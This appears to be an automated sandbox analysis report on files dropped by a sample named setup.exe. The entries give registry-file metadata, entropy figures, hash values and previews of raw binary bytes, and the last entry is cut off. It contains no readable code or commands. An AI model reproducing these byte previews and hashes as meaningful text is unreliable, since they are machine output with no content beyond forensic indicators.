              Preview:regf.5..p=.........2.p.Vc.I.ds.[.m82..H.b.5.\..p.<.n......L"...q...O}.tDK..X...=.!.Q9r.U..e.!.>.o.1.>.....r.!..%.pG.=...0...M....N.>...o......k..g..+.L.!)1...k4S{;2...~..4..0...ht}..OE.S...f..\..m.I..M..i..z.v.%-d.^NN.....O.ya...K...\....u...D..<|e..._...e...6..Q....xr|..D..+..6.|.(.U?!._{F.....q......4..Z..%4W..>...4..W..z.S.r...==..".`......5.XQox.......%w..F...R.}_..I.I...a.."..rH .!.R..I6k{..KfM.\.O...$/......\.?...l......W....{...I.."z..@...\..c-.P:.......K.^4..yzi.....;.}(.$..{.'....+W..3.%..G-B..(.]..T:.>.........s.)...,M.@E....g._%sZ.......7..{.......?J}...,.g}>;.!4...D.2......vn&.. ..._r..N..S...F.r,......2.....o:?.B ......=1...S.6...4.....?$.8.D..?.WC ..x...ro.}..$!^...Cr....8;$8.......8..4.v...+F...L(..>..%K...z!....>.j...*W.,...<#.C....u"c.p..K.^..|i..a.....O76>P....(.7J.Z.+Zo.....1.j.w.'.D.....Qt.\:5..;:....D.g........q..".+./..........(L.'..N.y....p{..-.}.c.]..N.U....../....=.b...X.tYJL2W#..%E...{.p...d.:...j..$=
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9781543921916835
              Encrypted:false
              SSDEEP:192:f8GFgr+8Qekalfw4oTzR6zJHnQl2Uk6X9sbTlCyBN:f8GiiVaxw3TzR6zJwzmPwQ
              MD5:19EEA9E65DF6C98E6BFD052C5EAE80A4
              SHA1:26E359E197D3E1C3B60AFE3857AC76D30A148A2F
              SHA-256:FF14D98BBB1C2116E56944F3140F29E57BECA783A4F808BB2E3BE95A723541A8
              SHA-512:5429F5802B56AE4493D45C16B6637026AA5CF42982DF5D932E1227F81C9E158E1FD8F411473ABD26D9ED9046EABC465432CBE2CE72324B6C143FE26D7AA2DFBD
              Malicious:false
              Preview:regf...:...MC....CV.u_.pj..e...9..".R.8..*.y*..w.....pG..9...yB.!.....t..P$...GZD.iFz..Q#oM...nX..B..U.l..~.R......LI...]Zj..J.Y.R...&T.8..*.PJ...F>.X..0&....d^P...........E...Y..(..6..Z..O.X...nu.......n#.n...g.8.SM.%.<..0$Vk...m.n}wp........|.F.&3^......F...%..bP.....:'...5..:......P|.".k....w..6C,"q..).....yLtj......D..H`....C.}..I..h......N..r;..,..X.......s$\.;".H-.3'...&.z!...8ta.yf....#..P...o.....:.k......`.....=...E-./.....^..9..={...t...@a...M..`...w..,J\..b.{....*.......T....(....H....q7.BM...D.J.,w0&.v..%........./..q...Y2..Q_/. -!j.w.<Z........?.....'..U..2....*{...3'.^....L.....G...a.$...^.js..r........G.t.kv....}*...h.}.XF.|i.I+.r<.....K(_Lu.k....p.f...G#a.4*3H.....[....c.|...3..L.3xFc.)m.D<1w^..X>[...n.t`..!...f.cxc.....B..s>..v.Qf.(k..[AF.4.`.4)=.....,5.U<.W.^Z=.>..S:...G.......i.....q... ;.I...kME..f...%.Jl.....-FV.<...qd.W.bk...@...#.bI.m.....b|......'....i.T..F.&....5T...........W..O`.{..:A....-.5'I.Z?...h..._X..Q.C.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979360293378676
              Encrypted:false
              SSDEEP:192:D1TGdTw/g1w14X94jk28CsYot4CDBbiBrSEqqrJK+caizIczS6U:Dk5mCw14NU8CsjtDBbYlqq4nNzh+z
              MD5:2C97B41CA7A1BC958312043528048052
              SHA1:A2D74B514DB30205C1FFB385414A8516CE7E1417
              SHA-256:71A50A2C0B58762805F902004965C9E07FACFCE39A340E52C4A90617099CF8ED
              SHA-512:8EC2112546C1424561C7EB521D0E05BF81AF0FBD7E55190A03016807488A5AF767EDDE852D5F5EB9B041AB9246CD6BB2965ACB0412201B9BD51E629311A4A897
              Malicious:false
              Preview:regf.......||..2.w..D.1.c.....e..$.o..{.T[{....".a.o...A.}..t.z..%.......<..!,Yf.J.X..M!....~..v.mh.d.q.&..lJ.'P*.....X\i.QqIs=@.]......b.|f.Z.S.3.ZH%}...w....C....\..1..A.........h..k..y.......Y*@..#.\..!rk .^c.....Nn....&jy.-;..%......?..7.o2.~$l....>..h^Bf...K?,b./^..6.An9...e....:u,.b..a|....E..&a.......2..B.._l..E.{..N...4y.Z..<.O .v............<EU.J...2n..*6........<E....2.......4ni_...Y(....t.3!..pb..V..J......8...jK...R.K.,..R...2.c.....d,........8.....j..J..$.)..a*..k....[=...#e.....6.^x.....n......F...................Lb......m._.,S`.....rh.......o.,.....H...6...f...n`..K....b.Di../@.E....U.W;.......L.#X......8...%../{."VQQT ...Q`..O.Cd,....h6..-v..ug.t......J..\V@N...".z......o.$..j.......q........cE..rI"..e..8'...|A..j..d...8..I:.X.*.9.....{'.k.D.p7.+I......b....l.......NY...../R..A.^.\T...}.g..,0w1.... ..X~.H..e.D....$..).z9+!.h..a....p&F.N......WPn.....w.....#M....^......GK......O.;...9.?.l.j0W......M.I".%:.:....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977285170197637
              Encrypted:false
              SSDEEP:192:fqS+muLmVgjuVDytL/L4tSBUSrGHX//9QWL:fCfLmeuVOtjL4tS5rgv/95
              MD5:9BC3F6863774EABB003D830E06D46C4C
              SHA1:D6FBAC499F00CC40A3B501735C31CA64C7BC23D3
              SHA-256:C015CBC86892103E11B0A43F75A183C47DCF73F3B9E428B63FC8943730ECDEE0
              SHA-512:8BD0214CEB50183FBB494483BCDF93E515EDE0DC59AB5CA40551E373AA137B9650FE648686DB3DFEB4B836616AEDC8FD4A350E41E24D4E4B2258ADE76748A21C
              Malicious:false
              Preview:regf...e.`q.a5l....*..?y.`?.>-QmZ.=.f. ........ZJ..r.U:...C...!.L,...'.\.#.......J.$.eU.....XS...s....Q...-.]6M.}....=.=\...ye.@#.....p..c..T.%Ky.0.|.(\b..%p....1.<..x.4.P..h.mp......VB|.7..(..s...y...`...N,..h^.E...['{...2..Rm....L..l"Q...C.(...o.rv4k%....._d....N^.....<.H .....2O5.Ma~<n..~IJ..e.1...$q.[.<.....I..?cE.&k...].\s....&y....d6^..d....V.DQG....s..~.[...Q...$$dZ.+..........Q.F.....Y.f..9.........#C...'.?.H...7.../w....(#M....G.f$.......&.Vi.h.6..m.$..1%.]L%.........B..W^y..u...f8w..V(..,.T.F.Q........>mRj+H!..v.n..Ke.......I%.>..=.]....H .......d=!.\....B.....z...].f.Na8.....jH2.o=..m..cb...T.o%..H3.Kd.m.)..m.r.........jg.CI..B7j.+wk$..Q.=x.+.%..`..Q.$...3.A8........5u..f.V}.......rew.B..f..`Wt.....0.**'C..v'....I5.C^.....J|..5.t.3uW."s.........r.'.>I0v.+U[".v..}.f...;<3a..pZ...:@.l<.....G..G1.!.#uC.'..>...%......B}Y..pl...%..:..M.W9...C....W..c7..N....,...K.\....[...]U...).x..{E9pV.;..n/MH.z.....#Z3.&e/..)CfsH.8.R....Z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977626897687619
              Encrypted:false
              SSDEEP:192:bKUJPt0XmG96mOny8S3NmCiyVYWXA3TSzOG:2UpiXmGAm4F/OYuA3+OG
              MD5:8DAA33E5A418F02EA2E6A4E4E05C930C
              SHA1:70FA2698A3A635A2C894DD87768991349C0FFC45
              SHA-256:3DE8A3FB37DB2E5F4895B4308BDD78EB259A4F93299452CEFFDA9FF14BCC399A
              SHA-512:28317B353BEE135511F130DFA88C2616C7A0E14A7C0B666579DCE5CC5095953AA6FECF01D0E8EACC36A08E7F85F5BAF85D92E0E285BBEF332648A239299BD6F8
              Malicious:false
              Preview:regf.{....~..vA.{..r..$...C#.....[.U.]....d'.B.E..a.........'{5b.3]^J..c..?......4.....+.M.xe.3...f`w7..E...%5....7>.......&...:...h.e..CV.t......a..rh.W.........;!q./.[Y=r.6^YO....B..mG....".i..BE...!'@4..*GRO.Z._...:.J.Q|.......b.@1..:7.f./.2.8...ws.M..{.N..G....Y2@M<.._...2..q.6.....q.p3.z...2.b.."}..l.......j'E~p.J.Qc.wv.f.`3H..f|.$wIS.(G....6.Z..KbK...VK.A..~=.q./.8.g..y\.y"."}.yp..<.2.>.MQ.DON.>..J.~S.qOmi.)...p.....(.D..a...)...5B,.X:6v.oy..,..c..K../.I.j.P.|cm?...#..<U...@..4......^...sY.5{.....vO.!h(.Y.!.`7...z....Fh.[.w...............$Y........=..Y#...~P`.....P.)..6.8.o...H...............A\.S..I/8...9....>ez..Kmu.9.Y)..O...T?.{...6*......B.PB.SoG.....(3.,c.vi...%KFx.Z..>+hN.....jc.....b.........!F.]._..n.=G.g...f.J1>^..BJi.Vf..c-/Z...h#.QUeq...j..J(*.A.tGn.I...PO.oT.@..R....`..N..e..W.......Hxn...n...&...].1.%..UL..BO....#vom.).g...Ya..l..L....@.."...`?..7....K.k.x.l.I...|7o....F."1G....'UN.gz^....:.}*.:........w
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980344476253025
              Encrypted:false
              SSDEEP:192:4ZG4SKmuhAeJS5Pl8mbhz8osz/g4Rpnw2BBzltTxqyK:4Z0KmuhAesnjzfE7zNqyK
              MD5:7CB4B792D7FC731A87D4782BCB9BAF49
              SHA1:45244F1D4DD6D5EAD6FF498C5D992A1B00A081CA
              SHA-256:15231D1967C0CA8AD916D7259A7349FCF1F75CB9A0BF56D5DC192813D187B825
              SHA-512:1B237BF1F0E0625FAC2C380841AB6A773522C64237FA51829B16463442004B591EBC64E077AA25B2676FA90E345F119BBC707E156E3A98C456F8B6EBFA2D97B1
              Malicious:false
              Preview:regf....g..K.....3...}n}T.d..O.y... ............$Q.... ..e..L.....}.2".gq.|.%....|..1.ya%.}...r..l.S..6|W.ad.b....`.7.0..R....G-;.......w..."....a.&.6..L..}......i.sD..+.v.d....C.....qb.f........C#?VR.F..8.i+.00..'R.1,..o...^..%.d)W..T.C5.....k..19....._.. 4...}QP..p.....*..:&.....u..d.J..y.t|Q..nQ..V$.pS.#>zC.d..-.$..... L}I.....k$..8..AhX...&...&.^h....i@..>f.....a...K...N..."...d.C.%7...w...W.R...j./Z~&...T.`xn..2.?.|3.....}......$. ..Q3..g..o.X...P..K.}.%3MQ>S.2b.4...\c......xIg.h.".Z..*_$B*.....h...>t...2..x..X......IFm...{.u... z1..k..Y.......................ay....X..h.."^.g.,Ct.c|............54. .+.B.DC..E.q.h.....3.?....V...q..il>.U;.?2..6H......K.M..J.k....r....?...*9|....%...v._.E....karg.BYK.P]..,#....n.h@..@>.n.`..$.X.8.............23a.........}rX&xh.>\...f=..........._..8/+'.6.FdA.4J...t..8.g.r.W).uG.'..4..5....[I...A.*C.@..;{.=F-G2....Wi.6.@..5-..Ua........Q.-....w..).i..... .4 R[[....T..Dv.............0.z.:..s....!f@S.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974569655621865
              Encrypted:false
              SSDEEP:192:zPV6maU4IgjiYRfhndvGQgNh+k0QQ3j14SEyf72H7T6+8ut5:z8ljiyfhnNGQgCkAj1co72HnPL5
              MD5:097C4B5B0AE91CF5853C5DBE8509C4F1
              SHA1:F920061A23DFE4807B5EC79743F3E6F3A8A01BD0
              SHA-256:D950E6AE88AB28FBD260828AD470EC7C205C61923A36D6ED1B4E90F1DDC7A5C5
              SHA-512:F85B91B436910BA9A99D8DE0CF50FC4030585BECBFE6596804B9CDA53FE0B209341E52B6D4C0B7DA4981C8047FA0BE8ED2EFEC45990C2FD786FFB5ECC1DC0E26
              Malicious:false
              Preview:regf..E...K..`.x.T.......,K.yBZ.."..h.X.'...h~..J/.L..=.-. .9.R.>c.......e.S..RY,..2.......?..U.....].n..MF.b.}k..T..Iw....f..%...Bc.xj.X..%.%O..snc.Gxo......rY..;.....SX....3.6..?..7...%iR...o..w.....f..#4z..Ck.U#3.z.I**.o..w...s.-.]......V..".U.....(_B....@....."*.....;.:_...<.45.......2]o...,w+...s%^.OGZ.m.....B8.....a..R.....T..P.s~.G.1...jm..........1k.E.$S.......2m.q.../.......AE.o.0..n..5-.".......a&..6w2U:Q,.,.-.J0....I;P.......AJI.f.l6].X....A.|...#.O<..4...F..n.#i.1.\n.?.+..g.3......P.[8._..n...1.;.......-MRO.3..x..H....&^@I...).zE...2..aV.1VXj....sf.........d..6..S.\..S..j.\>L.p..6............W...t .ic.>...<@.u..)_4.VY.....p.y....Q7-.3.b.:`(N&.9I...P.n...s.M.<...!{DO..C.[....c5.&...R.....G...F.1.X...u;..w....$..].f.^..kFR...h..y......4.4......T.G..e....s1...Plr....SKc.......n.k.dc......$.p.ux..(x.W=...4..Q...M....R....8....&k#.RGf4....~.x.....=m./....Z........f...l..0....);j_E..6.....t.j...%......wFdQ'..........A].d..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981211993599146
              Encrypted:false
              SSDEEP:192:U2Z/0iR0BDdJlS4IHsjLSSXLhWFKn0OeAtD+s7bnyjx:UQUDlS44sfbX0OeAB+yyV
              MD5:0FC8EC0C385F13A15D5A2D99B1FFDA05
              SHA1:D283DE449C3E8F442A1E067B8CB8AA9C88005BD9
              SHA-256:A91396FF1802F61578EAD7032B20493EFDB1CD1188513A5FE9D8CC0EBA904DC6
              SHA-512:4F1431CCF9CC19D17DBCF6D2550DA8191B01504D551C43857FEA1FEB694F5F56071D063BCE31BDF3B8A8BAF5AB37CCAD4C0F95FDD78AA6A3445C746967A048BB
              Malicious:false
              Preview:regf......<.A...(.k.X....-..s...a.+..wb...X.V[...).o..$X..If(.2i_.I!>..s%..0.a...^8._.d.....73A.Q....k-....;..Et.a.a.y|....v;.B....I9ldh:e..I. .Q...^yTYd..xJhI..*.h......#..a;9Z3.g.4..k..9.Z.(..).)...4......a...[.u*....l..V!d.l|9.s....]Y..*$.............{....B..T.DC....?.. -+.q.-.+i,.W.>.:U..%..t.yq..... C.._.t*...>...b.?S....7...?..........~4.$mk".x._.ed.yN..Yu8...:..)v.......j.o...*+H.*..,...cg.....n...T..%..v..`e$...C....M..i....l.&-b1.T.F.......>."L..ks.....FZF...D..W......[.^_...M.+`."...7\..p.._p......WP.]2..B..:..>y.ar..t#..0KhS.b':.$.atA..U...*t...:].....o..g.L.,....>Sl.t..R.o.@...-.....$.F.|....{b.*#.....0...F.Q!w..h...)...Y..}M..O7.b]~.84..r..#u..cm..O..a".3..f..C.B_37..Q...,......L.0j...qa~S[.E...!mML.8...U...PRzmo..N1..<.&H....M..5...K..=f..U.S...W...._....# ..pW......6...kl..b.E........7..:}...ch...C..\.J..3w.*..sx..d.`.J.0H.M.^Z~.s..B...yZ\.....b.~,M>......\G...="..Y..._0.w\l.P....k...l.m..C*.SY@..58.;.....`..B...x(..t..p.=.#.7
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976632375063587
              Encrypted:false
              SSDEEP:192:Lyn+6siKSoqyQRyFNDg44RWS65LG2oAInCH1BwS0rlv+7lvFeK:Ly+Bi3LyQeNk44AT0Ag6BZavwlNeK
              MD5:1D6CA7290BFEEAB8CE76169A32AD6C35
              SHA1:D2457E42C4D9C391884E07183574E160D4731551
              SHA-256:3404935D07A2C913E16CF4EB567DF8F2CA1803DC4D9306EF41B2C28B0C2B8977
              SHA-512:2C364365A10CEDAEBB1BECA76BB8039BB78DC2C03A7F7D2A1420FCCBCA7F26EA908BFAADE9D51810166A8B606858D8A81823F8D63ADCBEBC6258485D42B8D7B4
              Malicious:false
              Preview:regf....]jLd?1@j..)t~.'V....T..b9..E..~Lp.h8.J...m..kL...#S]t#v.r.5.g.1.:..!..7..........o.+ar..u.zX..!h/..6.........e..N..o2..%........'z.x9.g..8.A.40v3.x..t.B........x..).....<#p.v......rQ......[1..R.-.....kc.zR*.]U...L.._......hz..m..9...Q..h.Q..o..=.9V4)g@h.z..~..R"rH..O..%9....x..=2I;.....*....#..7z...6...K14..V]..]a..(..at.?.Y ...0+..;..&.E.w<I...!.4;.O.;z...Sg>.E...X..;...-;/.O.....y.=A.t.W.I..U.g}.*.qt..........?..f....@..,.w7.[..".....nC.>.lv.....Irw...v.......q..p..N.%..PT!..IQ.C..P....K....... Y.......A.W...p...P..H...u........#y>+..%...%.....A.....j'..Af..=.........\.K..?...kt.7...Ee.z..?4<K+...f...k.hkC?T4..v{.zCOgG.k.E..E...v:.e..!.....:.....>.?8.....q...c..[:D.zlk.......T....-,..=t....W0.M.......%.3*.....V.....a....G........vAyM.F..oU.l."P..d..=...L."......D..:..7..k.D.'-..vF.....5...,.7...}..*|.3.4../.U.....<.=3.gC...%F.MH.za.....r.....(f.-...n.%..<...b.>..3..I...O.R.)...#m..nnP.S......a....$..AR.......
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979216377979341
              Encrypted:false
              SSDEEP:192:gHZPgGhwtYvu+/L0FoJU2kZo/PWzeMrbu2itp/d8xg5NdUgO:gmGhaD+/vJv8oWzJrbul/RNE
              MD5:C45DB3D02699A7989B4D4BB8FF6C3D47
              SHA1:2E3CCB524CC3B7A898BB87185DDC4002E25EA561
              SHA-256:8B4475BE9A1F93BF2D257CA1108B1918812FC06EBFD56AEC26B9C7B0CAA1D465
              SHA-512:0CE80454E2D0DEE31E3E573218F1E61B594165F279A592A5431158514E2DB6EB05F5FBE1341CC6B156E78A178249888D9CBA3221DEDFC425D6A5C9760AEF4D64
              Malicious:false
              Preview:regf.o.,0....p.,.?.-.*.._3.}....O+}r....b.....e.XR..w.}...#.0.Kv=..=.k.v...b.jy..6..:.S.9Y....qR.p;uP%...{..o..\.......pG...;\.d.!.....=..'...h...\.4*...........f.b.(...M.........=...:..t........L....x.M....(w.U..z.A.AJ?s5.p.Y}F.."....sq%x../......^(....'l.{....y> L6.b.G.|.4I>..Z..i.'.B.CZ.P...;.SW{#t.$..e..M.......x=lEx..f...x...dW.%W....K..1e.f.b,...%.~u....@[X.?5Mv..`^....._..._.] ...S.:.3^@.R..:..R.)Y.y..?..W.C(.y.1.....8.]....a..mK....g.|.g(.g.....Y..a,.;.....KHpk-.\b#vb.`...Ob.C".'.7ii.....m.(.u...YDX...R..J.W...or.?..^.H....f..RD...&R.Y....oG&.r...":....x.).J...s..:+..v...M....#.+.Y..A5...0..qk..Q...Ti.g......r......7.ZG..=1>.XLj..Y&H.-..1...J.C?...)...#.b.F].Fo.;......0..7.u...rg..v....k0.}Zf.x...;...e:*.......,0.c5........QR$..evh..d|.P...O..Kc.7..H.t..A.+8%.....m..{.9..=1......T_.)..s?.s.....@B5...d.3.S.vZ..R?B,....M....p>............t..y.B..".eL...xp....#o.c?.P..A.YO.7L2}...v..0..k.....9.,;.m.,...6.....Q.vw....|
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979896034363837
              Encrypted:false
              SSDEEP:192:YjQu1pR8Jd8CQWe3XZm42hi52KHusV1l95jhKXIyzW:YJ1D8Jdrec42452HsVr9Xx
              MD5:205E4D622C0713E589FE62BEE581DED8
              SHA1:DF7F30ADE71B8BFB338B70429C80B51CB45D93C8
              SHA-256:32D37CB6B17443A84C2DBB8D63030001E97BF343C1627390AD27969112121C59
              SHA-512:701E569CE359229154139B074BF83441030171A64C3D150842A49571AADB6D245C6D6E8100E2A61D2BF84C25AE4DEE89D721CB529B3FFAE9AFCC90AFE47A66AB
              Malicious:false
              Preview:regf...u~OY...._%.AR%.....A..uez7..:.kb..."...VV.......a.h..C.?..y-.....Q......E.Q.9.S3.Lo.....`H....... ..%Y...g.......?..E....+..sq$8..7'.V.!.)i..B".>v....tQ.`]...^p..Z..g;F.8..gq.m...lo...@._.]...4i..N..a.....0#.......rPL..O.C.X?.."..q.........Mh)....n.......P.g.%.B........W.M.Q/.q....F.?...~.\..'|.2.?.Ji/......YP....m2].R...&?#%C....1...$\..U.'{...Q.{..K[c..|.EY...D..U,>..A%#.~...O...1O2....Rl...<.qy.c..y.....X..}......K..BvU.........z.m.y.S&..&......O.7...f/5.X..%.>..<n=.Kb.r.j].3.?...oHl.y@3^.7+...1.......Mb..N...#|.$.....b.._\.w.(.6F...c#.4Au...Z.Vrs .I{j8....0>..n..&..C....hT|...s..$.*M}@..)........5...\T_..Y$.C...FA+a..A..i......S%e...h..l.8CjS1....<...<..M..S...w.l.\..o.....z~....l.'}e....I...`0...%..t.X.@6.tAr.G..5..J..C..iaz:.P...jd...RJ. ....6...;y....|.2:.W..Xt1.@*.?.}..|l.v|2a<....'.9...*..^\..f.....v..]....Hd?! ..n....="...QF....._..b....lLxg.~.....4.;ZO.....Q..j....{..v.....w...^.{....@.}.R..Z7/.....2.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980803176438192
              Encrypted:false
              SSDEEP:192:VUIjO5QG9/aDSDRVukyvOQgf2wovGLfvebGSIeEvqg:Vxq5QG9vVujIvL3QGSIey
              MD5:4BCD4877B4752712DDA3B843A604DEFB
              SHA1:1709058045B682AD9AA1D7BDCCC3BFCC0B9DA60B
              SHA-256:66C45134B3F4E475FD1F611983129E8A84DC4F263B48DDF86A9A35EA3FD9E30F
              SHA-512:D604AF7267780E6DF213E5B73962A6FB36ED27153AB4BBCD80C2E5B286BD6B17A6374AFCB28D457453644455040C74D7D980FBA6C896AE837913F3974ABE8DA6
              Malicious:false
              Preview:regf....X.Tv...m.=.E...h.S...r.W....Nx...m.oU.7.....".&..1.q.@1..(I.....{.T.....8.]...w..5. d.!....:...h.3.m&4..7K^.o..^.$....u.W...?...ls.Z.....A.Y.*,.H.F...|.#..L/_.-WG0Cm..Jb.8.x<..z.wc.....3.....B.W. ...n<7..J>..J.:....n.zn...jIM..W.........59.e..x.>...m*...l~@[..<.we.c...r8.Z1..'.q.L..O.W {.w.s...4.{....G..._....mb...4.bZ.km.s..)o.E..u-."..w..!.......y....8.39.!...?..L.F.$..6..s..]...-(_.3V-l...Q%..+....*...}...SO..-L]o......K}g.]7.f{u.........z..H......M-c9.p.U$./.....[w.N.\.G..K.).:...|.n..k...D......;.R..z....o,...Y...-K.H..+.|^...W...R2.`.....k%P&.?..4.H^.9..~.{.;^68h.l.\.f.Ne......j.../.ICP..Z.~AB=*..L.....,..B1.........&..i..JK........>..D|g...kS.Io..kG.l^...k6c.h.........)w).d,...y"....i.K.D...O~.c..>....\8.z7.h.i|Z..OA8.^e.e8M..zWci^.F........:Sf..!...`ug.....I.[.:V.p...AE7.s....v4...%.;mD.:.a;.8.]....^.z..-..f.k....2.j5n^.L).*5. ..?.h....?......ac%.,7...Z..H.3..d~..?@.x.....r........|..Mr.-..k....#.Lq8..9.o..I..4.4...1...s.y_...G
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.974832240825216
              Encrypted:false
              SSDEEP:192:wcGZ7TClmfNDUMYEZYDwlSsY12mAQEzqFxii5:wtEkfBUvTDASTAQEzqFxii5
              MD5:3652504107F5542AA3AFC43BDFE824D6
              SHA1:5AF1971D2CCCBF473D3985A2C6392880CF6150E1
              SHA-256:32107FBDEC2F9083D405E4C8C9B7C472630D67677FBFB715E26ECCFC3ED06766
              SHA-512:584351EC7CF3D4DFEFF3CFC9FAA9DB2685F87CF32DBECCCD231EDB5BC58D46828F5D05B596A6D86FB24E41CB0F7C4BD2F10D786D8FD2DA1E7E38115370A88BC4
              Malicious:false
              Preview:regf..fyL+..^.c..u..b.....]J........^.~.G..k...S.}.q..XU..(...r.0/.u_...c....T*I.K.....OR....ih.X...."%}..L.....K....H].2.R._kO..Z.vK.:..~..whJ......A........u.Z.-`jqT.......F."(.....=.p...$.%...<.3...Ep{....?i.+.g._.F?....Qh)C....-.Ws.p...[..n...+d/.....|.,...P4.)j.Vd...."....W..R\%..xyH.....^/......gp...z..K.'*v]....pd..w.8..-..[.Nh.K.e....oX/........!.MB.ffD.J._*eflU..^....N...w..q..|5...)Eg.d.......`9A.l..:v...B.....xJ*..8..6/.U...j.x......z.. .qh..@k...w &.;...J...A^KT..<.s.......h.f..5..q.Qg._....b..D!q..M:F(..../.U....AO<O'.R=.A."3..G..Tv..6t.u..3.@d.CHn..D..}.v..1.i...d...R>K.\..(.L..W.ls..'...+...aw..'.>.6d..K.'[K...`.)<.....(..|...p....2l.r(........+5.-@.....&].l.KE..}.p.2.%..:..{...19....5r2.....PK{1.Q.BW.5..E..7,3.W....V.-r.XDA1*.S.ZZR..a}k.S..T.c...t..{....@..T..Y..}g..lN....m~...Y....U..>....]...]wc\-..k.N.n.G.Ew~9....+..w_O L...;[kY.&.5..1...D>..%......C2..:2.Q&.;..aN'...B....+....U./..IQ~......k.fj.BE.C.......^....k.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981237552329535
              Encrypted:false
              SSDEEP:192:uCEXEx+mozLHSmGi22UtKaZAPg2KEJIdLzmr0lbxpA9YtIK1caLWDm:MXE8RzLHSmGi2VZACEJIAr0lbLA4caaq
              MD5:F7A1A9AF96FC6B094DF48ABA45123C3B
              SHA1:D041045AC1FE0E7724F99E44B1A3E9670E9F31C3
              SHA-256:176B10C19CDBF6BBA13080312312EED234D65F50741A12CC74773D202C11B307
              SHA-512:10444B5B4BC13E89C3141EC8307E4D44D26BA8FA3F739657EF2066F217D01FED6A33CDB4D104C203628CB417CD348482C2F0FFBC7ADD1BDE5CAFE920F8086EDD
              Malicious:false
              Preview:regf.wz ......TC..[.o+.n.*.F6.NOK.(;..c....'\.vL...EI.....`E..Nk.....@.....Q..n.z.....Cg..pJ.S.&...T.F....9.;...D....Aw......qX..pt]1.{..K.*..... z......`,@,..%/......q.G..*..H]%.....:.g........+.....F.O..|...#v.(e.....m....tO..p.+.....O}.....g...~.(.3F...3.K.N.&y......P....k..x..-n....{.\.*R.. D.&)..).O....e4.?...|...Xb6..A ..rs.....^....^8.t$........!2.p..u.y...GAi.f..[X..}...{.a.~R...W.;H!...FH..y...b.C...c@.... .4._ D?....0.......`....'........$.T.XT.<.E..e8f.f...8...X5).;...J..=o.N..@~i..Q>.Y#Ej..7.Fs.q..d.......].....p.q...4U_...rb.Y...[|S1:.........r.c6bl...)..!.0.....5T.v.^....)u]@.k.....n,.hgM.n......7..,..`y..Z...c@..#......}.H..".%..{{.|.f...}Q.U.fK.j...g.].A.q..(`.y.....9}<....Q....Mr.6.BvU...A$?.D......+.(.}.....5.c..g@D&.qg..F~....mqQ..+....@l[..G..O....y.&..M;6.F..$....B)..`.......}..-5.........^...l..e....1..2G.f...C.~.p...Cg...67..........p..r.q[.f.....&W8C..^.%"...._..a?.G>S..6J.m....U~p..{......g.........H....?.'.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976546866192708
              Encrypted:false
              SSDEEP:192:gxFUFxsQiEqHu2qoU8ssQJDsHPu8+lfBFN+RRjE+KtoyPy0C3Z:wFUlf2qXsQJqB+X+jE+QnCp
              MD5:28DFC53F97E581C93DD8BD882505E22C
              SHA1:9B9D8C462F6D5959BF44212FB2E578C74442048E
              SHA-256:22AC2B5E462A70DC290CD5502A425DE7BCC67161662FE1859779D4E2D390CC2A
              SHA-512:100F0DB3E2559E9DD1EE5907C927840DB60A7DC3056D85E8264B7978FCD0CDCB5B65F7FD708F2CFD3E0B0B829BA500ED8F8477A745C451C853917031855F4E4A
              Malicious:false
              Preview:regf.D..w....!..~g.<......1.x...&8..W~.......ra.R..q[...u........E.h..$.o..qf.."'.k.-..T.}_+.~;..#...].vE...I.~..8.l.@.)..........j...!~...Y...9...y.....D\_.9K...F../.9......7H.9S..y.i.~xY.+..Z...iBR.'.h.=....K..6..r.@i./...RvV.Y.&. .2pG.....m..F..S.!......z?..8......Q.....?....+.....X.W...j....+p....G...l. #.2..ga...O..?Z.....*..|M..)..}.i....d..wl..V......$...Y....AL .z.*H.}!.N;k.R.w.5.6R...Ld8.<DW .=..jI.8.mJ.mX.0...3.x...5,h.|.........n.....Ap9P....x.`.T...F..-.+*...`o...6o'3.P...p.$.Iym..lX..(q?.F.K..D..T.)........i.x^......S).#0.....L{J.l..&.(...qV..%...{-.l.a&.#s*.5_..B.$....Ec.k.=-....Y.6.....,.-.\.Jj..\!....".Mx..(...1yZ8.%....<.L.y$p^....$O....r.I....t.... O....#...hZD%..U.@%.1.E....r.".....Rz..F.5L&.N..qkz3{.*h?;(.2.9(.GA..AyR...!.....u....ne.`...!..N8r.S.|6U~IR.s.Q...u...{..JF-........Z.r...+..X.^.1...sK5f.}IM.J!.O...|.....[...K)...FXW..b? .#..$.f...W8.,l.U>......r....u>..H..&..6kW.%...B.W.'..eJ<...h....+w......{..uW...2
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
